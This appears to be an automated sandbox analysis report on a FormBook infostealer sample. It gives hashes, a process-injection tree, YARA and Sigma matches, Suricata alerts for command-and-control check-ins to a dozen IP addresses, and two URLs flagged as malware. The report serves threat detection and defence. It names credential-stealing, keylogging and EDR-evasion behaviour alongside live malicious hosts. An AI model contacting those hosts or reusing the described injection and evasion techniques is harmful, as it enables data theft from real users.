
Windows Analysis Report
KSts9xW7qy.exe

Overview

General Information

Sample name: KSts9xW7qy.exe (renamed because original name is a hash value)
Original sample name: faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea.exe
Analysis ID: 1586004
MD5: 0cff79b58dc5c20effd62a99e489556c
SHA1: fc68ff8f2d72961ccedda7fe76c95f1270e21d10
SHA256: faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KSts9xW7qy.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\KSts9xW7qy.exe" MD5: 0CFF79B58DC5C20EFFD62A99E489556C)
    • svchost.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\KSts9xW7qy.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pTPcvfjkbwUWkD.exe (PID: 2412 cmdline: "C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 7164 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • pTPcvfjkbwUWkD.exe (PID: 3752 cmdline: "C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ParentImage: C:\Users\user\Desktop\KSts9xW7qy.exe, ParentProcessId: 6916, ParentProcessName: KSts9xW7qy.exe, ProcessCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ProcessId: 6964, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ParentImage: C:\Users\user\Desktop\KSts9xW7qy.exe, ParentProcessId: 6916, ParentProcessName: KSts9xW7qy.exe, ProcessCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ProcessId: 6964, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:12:50.222180+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | TCP
2025-01-08T16:13:13.987528+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:27.395483+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:42.553844+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49854 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:55.916392+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49946 | 194.195.220.41 | 80 | TCP
2025-01-08T16:14:10.348384+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:24.016119+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50026 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:38.111978+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50030 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:51.423596+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50034 | 209.74.77.109 | 80 | TCP
2025-01-08T16:15:04.892532+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50038 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:18.236252+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50042 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:31.561801+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50046 | 199.59.243.228 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:12:50.222180+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | TCP
2025-01-08T16:13:13.987528+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:27.395483+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:42.553844+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49854 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:55.916392+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49946 | 194.195.220.41 | 80 | TCP
2025-01-08T16:14:10.348384+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:24.016119+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:38.111978+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:51.423596+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 209.74.77.109 | 80 | TCP
2025-01-08T16:15:04.892532+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:18.236252+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:31.561801+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 199.59.243.228 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:13:06.356572+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:08.901022+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:11.441722+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:19.609541+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:22.180861+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:24.849361+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:34.870994+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:37.453725+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49820 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:40.001405+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49838 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:48.248148+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49895 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:50.823965+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49911 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:53.346740+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49927 | 194.195.220.41 | 80 | TCP
2025-01-08T16:14:02.727959+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49981 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:05.236870+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49999 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:08.023489+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:16.027012+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:18.611002+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:21.387697+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:30.383853+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:32.991448+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:35.548903+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:43.777584+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:46.301778+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:48.865463+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:57.187963+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 188.114.96.3 | 80 | TCP
2025-01-08T16:14:59.749418+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:02.354360+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:10.618642+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:13.142928+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:15.775249+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:23.845041+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:26.403999+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50044 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:28.949228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50045 | 199.59.243.228 | 80 | TCP


                AV Detection

Source: http://www.beylikduzu616161.xyz/2nga/ | Avira URL Cloud: Label: malware
Source: http://www.orbitoasis.online/k6yn/ | Avira URL Cloud: Label: malware
Source: KSts9xW7qy.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: KSts9xW7qy.exe | Joe Sandbox ML: detected
Source: KSts9xW7qy.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3519820185.000000000060E000.00000002.00000001.01000000.00000004.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3519916221.000000000060E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EB6CA9
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00EB60DD
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00EB63F9
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EBEB60
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EBF5FA
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EBF56F FindFirstFileW,FindClose,0_2_00EBF56F
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1B2F
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1C8A
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EC1F94
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029CC3A0 FindFirstFileW,FindNextFileW,FindClose,3_2_029CC3A0
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 4x nop then xor eax, eax 3_2_029B9F40
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 4x nop then mov ebx, 00000004h 3_2_032604CE

                Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 66.29.132.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 66.29.132.194:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 66.29.132.194:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 66.29.132.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49838 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 66.29.132.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49895 -> 194.195.220.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49911 -> 194.195.220.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49927 -> 194.195.220.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 103.230.159.86:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 103.230.159.86:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 103.230.159.86:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 118.107.250.103:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 118.107.250.103:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 118.107.250.103:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 199.59.243.228:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 199.59.243.228:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 199.59.243.228:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 118.107.250.103:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 118.107.250.103:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49946 -> 194.195.220.41:80
